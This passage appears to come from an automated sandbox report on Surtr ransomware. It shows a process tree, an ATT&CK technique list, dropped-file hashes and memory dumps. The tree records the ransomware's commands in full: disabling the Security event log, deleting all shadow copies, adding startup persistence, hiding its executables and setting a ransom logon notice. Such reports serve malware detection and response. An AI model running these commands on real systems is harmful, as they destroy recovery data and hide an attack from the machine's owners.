  "C:\Windows\System32\cmd.exe" /c wevtutil.exe sl Security /e:false
  2⤵
  PID:4020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe sl Security /e:false
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
  2⤵
  PID:3352
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN exp /TR C:\Windows\explorer.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:2892
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
  2⤵
  PID:4296
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
    3⤵
    PID:4048
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
  2⤵
  PID:2340
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 0 /f
    3⤵
    PID:3036
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f
  2⤵
  PID:4856
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation /v Manufacturer /t REG_SZ /d "Tribute to the REvil <3" /f
    3⤵
    PID:3224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Unfortunately , ALL Your Important Files Have Been Encrypted and Stolen By Surtr Ransomware. Find SURTR_README files and follow instructions." /f
  2⤵
  PID:1288
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Unfortunately , ALL Your Important Files Have Been Encrypted and Stolen By Surtr Ransomware. Find SURTR_README files and follow instructions." /f
    3⤵
    PID:824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Service\Surtr.exe"
  2⤵
  PID:4588
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s "C:\ProgramData\Service\Surtr.exe"
    3⤵
    - Views/modifies file attributes
    PID:1828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%TEMP%\Service\Surtr.exe"
  2⤵
  PID:356
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe"
    3⤵
    - Views/modifies file attributes
    PID:2752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"
  2⤵
  PID:4740
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe"
    3⤵
    - Views/modifies file attributes
    PID:4736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
  2⤵
  PID:3204
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
    3⤵
    - Drops startup file
    - Views/modifies file attributes
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h +s C:\ProgramData\Service\SurtrBackGround.jpg
    3⤵
    - Views/modifies file attributes
    PID:1388
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h C:\ProgramData\Service\SurtrIcon.ico
  2⤵
  PID:5080
- - C:\Windows\SysWOW64\attrib.exe
    attrib +h C:\ProgramData\Service\SurtrIcon.ico
    3⤵
    - Views/modifies file attributes
    PID:5020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f
  2⤵
  PID:2812
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr /va /f
    3⤵
    PID:2160
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr\UserChoice /v ProgId /t REG_SZ /d surtr_auto_file /f
  2⤵
  PID:3664
- - C:\Windows\SysWOW64\reg.exe
    reg ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.surtr\UserChoice /v ProgId /t REG_SZ /d surtr_auto_file /f
    3⤵
    PID:3692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f
  2⤵
  PID:912
- - C:\Windows\SysWOW64\reg.exe
    reg ADD HKEY_CLASSES_ROOT\.surtr /ve /t REG_SZ /d surtr_auto_file /f
    3⤵
    - Modifies registry class
    PID:4800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f
  2⤵
  PID:3420
- - C:\Windows\SysWOW64\reg.exe
    reg ADD HKEY_CLASSES_ROOT\surtr_auto_file\DefaultIcon /ve /t REG_SZ /d "C:\ProgramData\Service\SurtrIcon.ico" /f
    3⤵
    - Modifies registry class
    PID:4824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
  2⤵
  PID:4796
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:5064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1960

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:3036

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:5076

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4820

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3228

C:\Windows\system32\vssadmin.exe
vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:416

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:1424

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Data Destruction

T1485

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe

Filesize
1.1MB

MD5
ffc6b559c24b8d82afcb5c01bb5619d9

SHA1
8e068e9c486769716d9685f85687b531ab3a88cf

SHA256
b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0

SHA512
48cf29ecbf184f9d96b9db95190657604c7fb9570046abbeba70d99c6748afbea5f698bb4bb91b1b9b3b3ab7abc56c36a3230aa20c58a99269fe0a4884522191

Download Submit
C:\ProgramData\Service\ID_DATA.surt

Filesize
14B

MD5
555b400a141d70433630f8125507a0d1

SHA1
280193e8688c675013bcba6b109874b56a7b67ef

SHA256
25b82110ba8d12862492c7bfbb40463d9fcee5285aac5d5976ea6c4eb885721f

SHA512
09accde8b039b06ef33ed534b90cf1fce963d1a0c448f8be4e14a8bfcaae85e54ee0cf540af65a86ffbaecd42a6f75bfa4e705927fbe492785dcaacb171c416f

Download Submit
C:\ProgramData\Service\PrivateData_d75kolyhzzoec2.surt

Filesize
1KB

MD5
b0e51fb7d359a83bfe07b5551da5bcad

SHA1
b9de5eb02834b0c6b80e62e136c09cf5b9ee326a

SHA256
d32227b4cfed1b289db8754b06847dcb3d77449bf171c0660512267438fbab76

SHA512
c31940778e3d48df4a674eac1f0139330bbd966c93cae5601ddbfd4686df1abc9844e4459105baed325fc6c8e473187a2f3b7fbef9f370967283ee4669db5861

Download Submit
C:\ProgramData\Service\PublicData_d75kolyhzzoec2.surt

Filesize
204B

MD5
0cef6b22e59d5b006668e0bfae7c0f4a

SHA1
2b213b4c842217751c1082d794fa756273bf9d8c

SHA256
357ff2ecd974d28aae8ca1c062dd97a0b7da6c060674fdaa023143df38224bc1

SHA512
58c5e758614f398e83d28371d363d1a218f160f7ed66667f5a5ff93593189b0345f23b303d14b0a2285343044fc1d0612dc6bddebc3a4a09c9f62c7410b9ca06

Download Submit
C:\ProgramData\Service\SURTR_README.hta

Filesize
8KB

MD5
c98bcf47b31bd83a10b321f4c74c372e

SHA1
ac2937efa6d577d1a635fb58111ec1004587c13e

SHA256
fb11cda25dbc40b7fb2f0adbf4872937c3c663db2622532ad5dbee248e2a2639

SHA512
3cc3c3b7a5af4320b471e66985b7fbb97632dbb24b392e1061b2aa344f3c1848883cb91150f9007bee57dd838c69cb8317d13c1c5b5d17dfd8e03a7eb8f0e163

Download Submit
C:\ProgramData\Service\SURTR_README.txt

Filesize
613B

MD5
0d64d020f9991706fdf42e8c5b84e001

SHA1
5ee54e9c94cd354f98922727638bbc65fd510200

SHA256
a723a74ad5ceac7a2ea34a6964ddd8d2f9bc137c2da2fe0e45bb48731c45796d

SHA512
627df65d832ae9e90abfef364963d159c45f6bfd7ba97a2c32fbf574a783e8ce4555573ebe1e3bdb64ddb73527ebea60717076227d470b998a63b6814294f539

Download Submit
C:\ProgramData\Service\Surtr.exe

Filesize
1.1MB

MD5
ffc6b559c24b8d82afcb5c01bb5619d9

SHA1
8e068e9c486769716d9685f85687b531ab3a88cf

SHA256
b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0

SHA512
48cf29ecbf184f9d96b9db95190657604c7fb9570046abbeba70d99c6748afbea5f698bb4bb91b1b9b3b3ab7abc56c36a3230aa20c58a99269fe0a4884522191

Download Submit
C:\ProgramData\Service\SurtrBackGround.jpg

Filesize
30KB

MD5
33f7fc301be9d39fcb474fb8b1e5f42e

SHA1
a3bf9ddb2ac53bc4b12b249825189a7c7a07b766

SHA256
99cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03

SHA512
6cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00

Download Submit
C:\ProgramData\Service\SurtrIcon.ico

Filesize
78KB

MD5
3257eb22824b57fe3d58074bca3128d3

SHA1
6f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97

SHA256
5afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad

SHA512
7b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe

Filesize
1.1MB

MD5
ffc6b559c24b8d82afcb5c01bb5619d9

SHA1
8e068e9c486769716d9685f85687b531ab3a88cf

SHA256
b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0

SHA512
48cf29ecbf184f9d96b9db95190657604c7fb9570046abbeba70d99c6748afbea5f698bb4bb91b1b9b3b3ab7abc56c36a3230aa20c58a99269fe0a4884522191

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe

Filesize
1.1MB

MD5
ffc6b559c24b8d82afcb5c01bb5619d9

SHA1
8e068e9c486769716d9685f85687b531ab3a88cf

SHA256
b88fe97196d3ea799b1e708ab452e9a61f9380a8b27a82f03575f5f046b036d0

SHA512
48cf29ecbf184f9d96b9db95190657604c7fb9570046abbeba70d99c6748afbea5f698bb4bb91b1b9b3b3ab7abc56c36a3230aa20c58a99269fe0a4884522191

Download Submit
memory/3892-164-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/3892-160-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/3892-161-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/3892-162-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/3892-163-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4560-173-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4560-174-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4560-172-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4560-170-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/4560-171-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-167-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-149-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-156-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-154-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-155-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-157-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-158-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-165-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-166-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-168-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-143-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-144-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-140-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-141-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-115-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-139-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-138-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-137-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-136-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-135-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-134-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-133-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-132-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-153-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-145-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-180-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-116-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-117-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-152-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-142-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-146-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-131-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-130-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-179-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-178-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-177-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-151-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-150-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-148-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-118-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-176-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-129-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-128-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-147-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-125-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-175-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-127-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-126-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-124-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-123-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-122-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-120-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-121-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download
memory/5004-119-0x0000000077BE0000-0x0000000077D6E000-memory.dmp

Filesize
1.6MB

Download